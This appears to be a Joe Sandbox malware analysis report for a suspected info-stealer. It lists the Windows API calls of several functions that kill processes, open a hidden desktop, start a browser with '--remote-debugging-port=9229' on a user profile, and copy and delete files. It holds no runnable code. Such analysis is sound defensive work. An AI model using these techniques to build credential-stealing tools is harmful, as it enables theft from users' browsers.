                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: 890654437ceb184e8730fadedac1e977f973a4248a4b9aad56e8d7241f9a5e0d
                                  • Instruction ID: ac8ba38689f0ae351070620904f8bfe5282f2529378f63cfa2f3dace5f0a9795
                                  • Opcode Fuzzy Hash: 890654437ceb184e8730fadedac1e977f973a4248a4b9aad56e8d7241f9a5e0d
                                  • Instruction Fuzzy Hash: 05C1717191021C9FCB21DF64DD85EEE777ABF88300F149599F609A7290DE34AA85CB60
                                  Function 003E9770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 003E9790
                                  • lstrcat.KERNEL32(?,?), ref: 003E97A0
                                  • lstrcat.KERNEL32(?,?), ref: 003E97B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003E97C3
                                  • memset.MSVCRT ref: 003E97D7
                                    • Part of subcall function 00403E70: lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00403EA5
                                    • Part of subcall function 00403E70: lstrcpy.KERNEL32(00000000,011B0000), ref: 00403ECF
                                    • Part of subcall function 00403E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,003E134E,?,0000001A), ref: 00403ED9
                                  • wsprintfA.USER32 ref: 003E9806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 003E9827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 003E9844
                                    • Part of subcall function 004046A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004046B9
                                    • Part of subcall function 004046A0: Process32First.KERNEL32(00000000,00000128), ref: 004046C9
                                    • Part of subcall function 004046A0: Process32Next.KERNEL32(00000000,00000128), ref: 004046DB
                                    • Part of subcall function 004046A0: StrCmpCA.SHLWAPI(?,?), ref: 004046ED
                                    • Part of subcall function 004046A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404702
                                    • Part of subcall function 004046A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00404711
                                    • Part of subcall function 004046A0: CloseHandle.KERNEL32(00000000), ref: 00404718
                                    • Part of subcall function 004046A0: Process32Next.KERNEL32(00000000,00000128), ref: 00404726
                                    • Part of subcall function 004046A0: CloseHandle.KERNEL32(00000000), ref: 00404731
                                  • memset.MSVCRT ref: 003E9862
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E9878
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E9889
                                  • lstrcat.KERNEL32(00000000,00414B60), ref: 003E989B
                                  • memset.MSVCRT ref: 003E98AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003E98D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E9903
                                  • StrStrA.SHLWAPI(00000000,011B06A0), ref: 003E9919
                                  • lstrcpyn.KERNEL32(006193D0,00000000,00000000), ref: 003E9938
                                  • lstrlen.KERNEL32(?), ref: 003E994B
                                  • wsprintfA.USER32 ref: 003E995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 003E9971
                                  • memset.MSVCRT ref: 003E9986
                                  • Sleep.KERNEL32(00001388), ref: 003E99E7
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                    • Part of subcall function 003E92B0: strlen.MSVCRT ref: 003E92E1
                                    • Part of subcall function 003E92B0: strlen.MSVCRT ref: 003E92FA
                                    • Part of subcall function 003E92B0: strlen.MSVCRT ref: 003E9399
                                    • Part of subcall function 003E92B0: strlen.MSVCRT ref: 003E93E6
                                    • Part of subcall function 00404740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00404759
                                    • Part of subcall function 00404740: Process32First.KERNEL32(00000000,00000128), ref: 00404769
                                    • Part of subcall function 00404740: Process32Next.KERNEL32(00000000,00000128), ref: 0040477B
                                    • Part of subcall function 00404740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040479C
                                    • Part of subcall function 00404740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004047AB
                                    • Part of subcall function 00404740: CloseHandle.KERNEL32(00000000), ref: 004047B2
                                    • Part of subcall function 00404740: Process32Next.KERNEL32(00000000,00000128), ref: 004047C0
                                    • Part of subcall function 00404740: CloseHandle.KERNEL32(00000000), ref: 004047CB
                                  • CloseDesktop.USER32(?), ref: 003E9A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 2040986984-1862457068
                                  • Opcode ID: ca0e7f49e39a88f0c306a05d5838f15beb95fa1fdc00e2828b679eecd18ed105
                                  • Instruction ID: 2ed5ae051d25c8d34b384b3f4ca4cd34d29ca347cb3b93ee8aa2cc1fa685cd78
                                  • Opcode Fuzzy Hash: ca0e7f49e39a88f0c306a05d5838f15beb95fa1fdc00e2828b679eecd18ed105
                                  • Instruction Fuzzy Hash: 62918771900218AFDB11DF74DC45FDE77B9AF48700F148169F609AB191DF74AA44CBA4
                                  Function 003F1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F12BF
                                  • lstrlen.KERNEL32(00414CA8), ref: 003F12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F12E7
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003F12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F133A
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003F135C
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003F1376
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F13E2
                                  • lstrlen.KERNEL32(00411794), ref: 003F13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F140A
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1416
                                  • lstrlen.KERNEL32(?), ref: 003F1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F147A
                                  • StrCmpCA.SHLWAPI(?,011AECF0), ref: 003F14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1535
                                  • StrCmpCA.SHLWAPI(?,011AF418), ref: 003F1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F15E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003F181C
                                  • FindClose.KERNEL32(00000000), ref: 003F182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: a2a88016feab553d5364461eb8ecb4ae9b20c4127fd7f912afe94e4599945b65
                                  • Instruction ID: 84b5876d08755ec32e3977e8ed78d554088e7b5daed5a4d5932eebf0b26033d3
                                  • Opcode Fuzzy Hash: a2a88016feab553d5364461eb8ecb4ae9b20c4127fd7f912afe94e4599945b65
                                  • Instruction Fuzzy Hash: A9C1C031A1021ADBCB22EF75EC89AEF77B9AF44300F055129F94A97291DF34DD458BA0
                                  Function 003FE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 003FE22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003FE243
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003FE263
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003FE27D
                                  • wsprintfA.USER32 ref: 003FE2A2
                                  • StrCmpCA.SHLWAPI(?,0040CFEC), ref: 003FE2B4
                                  • wsprintfA.USER32 ref: 003FE2D1
                                    • Part of subcall function 003FEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003FEE12
                                  • wsprintfA.USER32 ref: 003FE2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 003FE304
                                  • lstrcat.KERNEL32(?,011B0B20), ref: 003FE335
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FE347
                                  • lstrcat.KERNEL32(?,?), ref: 003FE358
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FE36A
                                  • lstrcat.KERNEL32(?,?), ref: 003FE37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003FE394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE422
                                  • DeleteFileA.KERNEL32(?), ref: 003FE45C
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003FE49B
                                  • FindClose.KERNEL32(00000000), ref: 003FE4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: 1eee47d24de33ae85dba91cbf990abdcf68a61bc2508b5c6efb3b9bc54b988ab
                                  • Instruction ID: a3ad70ed2bc22e673fd0003fe1a1004dff6d53ccb6df3fbb6a2ed1ab2fe82b94
                                  • Opcode Fuzzy Hash: 1eee47d24de33ae85dba91cbf990abdcf68a61bc2508b5c6efb3b9bc54b988ab
                                  • Instruction Fuzzy Hash: A481737290021CAFCB21EF65DC49AEF7779BF44300F0489A9B61A97191DF74AA45CFA0
                                  Function 003E16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E16E2
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E176C
                                  • lstrcat.KERNEL32(00000000), ref: 003E1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E17A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E18FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: d78b4905922dc167132e7fac8316f4bd0cb4f4d32be2c8964ab23672ee9de69d
                                  • Instruction ID: f1e576b1b8a2e4698b05276b05cc7be191090da6038958a3d999a5c76daa7fe8
                                  • Opcode Fuzzy Hash: d78b4905922dc167132e7fac8316f4bd0cb4f4d32be2c8964ab23672ee9de69d
                                  • Instruction Fuzzy Hash: 7A81A8319101AADBCB23EF66D885AAF77B9AF04700F055325F805AB2D2CB709D51CBA1
                                  Function 003FDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003FDD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003FDD4C
                                  • wsprintfA.USER32 ref: 003FDD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003FDD79
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003FDD9C
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003FDDB6
                                  • wsprintfA.USER32 ref: 003FDDD4
                                  • DeleteFileA.KERNEL32(?), ref: 003FDE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003FDDED
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                    • Part of subcall function 003FD980: memset.MSVCRT ref: 003FD9A1
                                    • Part of subcall function 003FD980: memset.MSVCRT ref: 003FD9B3
                                    • Part of subcall function 003FD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FD9DB
                                    • Part of subcall function 003FD980: lstrcpy.KERNEL32(00000000,?), ref: 003FDA0E
                                    • Part of subcall function 003FD980: lstrcat.KERNEL32(?,00000000), ref: 003FDA1C
                                    • Part of subcall function 003FD980: lstrcat.KERNEL32(?,011B04A8), ref: 003FDA36
                                    • Part of subcall function 003FD980: lstrcat.KERNEL32(?,?), ref: 003FDA4A
                                    • Part of subcall function 003FD980: lstrcat.KERNEL32(?,011AED80), ref: 003FDA5E
                                    • Part of subcall function 003FD980: lstrcpy.KERNEL32(00000000,?), ref: 003FDA8E
                                    • Part of subcall function 003FD980: GetFileAttributesA.KERNEL32(00000000), ref: 003FDA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003FDE2E
                                  • FindClose.KERNEL32(00000000), ref: 003FDE3D
                                  • lstrcat.KERNEL32(?,011B0B20), ref: 003FDE66
                                  • lstrcat.KERNEL32(?,011AF318), ref: 003FDE7A
                                  • lstrlen.KERNEL32(?), ref: 003FDE84
                                  • lstrlen.KERNEL32(?), ref: 003FDE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FDED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: 1bcdef78057c27ff86ce858d6607395852b730c6d7932539514635f308cc1295
                                  • Instruction ID: c3cb69f53a22dbee6ea4244b54bdf3ed2eb8b9e71cd283216d976a8a1dfef72d
                                  • Opcode Fuzzy Hash: 1bcdef78057c27ff86ce858d6607395852b730c6d7932539514635f308cc1295
                                  • Instruction Fuzzy Hash: 0C616372910218AFCB11EF74DC89AEE77BABF48301F0485A9B60597291DF34AA55CB50
                                  Function 003FD530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 003FD54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003FD564
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003FD584
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003FD59E
                                  • lstrcat.KERNEL32(?,011B0B20), ref: 003FD5E3
                                  • lstrcat.KERNEL32(?,011B0BC0), ref: 003FD5F7
                                  • lstrcat.KERNEL32(?,?), ref: 003FD60B
                                  • lstrcat.KERNEL32(?,?), ref: 003FD61C
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FD62E
                                  • lstrcat.KERNEL32(?,?), ref: 003FD642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FD682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FD6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003FD737
                                  • FindClose.KERNEL32(00000000), ref: 003FD746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: 6f6f1f671ae68a94766fbf20c61c91a7333f3ca4976d8e003c3b4b574d583424
                                  • Instruction ID: 185fb504a035cf1c5138c505a71d0e9159dbaceb06941a6b0566f9d3cf739372
                                  • Opcode Fuzzy Hash: 6f6f1f671ae68a94766fbf20c61c91a7333f3ca4976d8e003c3b4b574d583424
                                  • Instruction Fuzzy Hash: 0C6183719102199FCB21EF74DC88AEE77B9EF48301F0485A9E649D7291DB34AA54CFA0
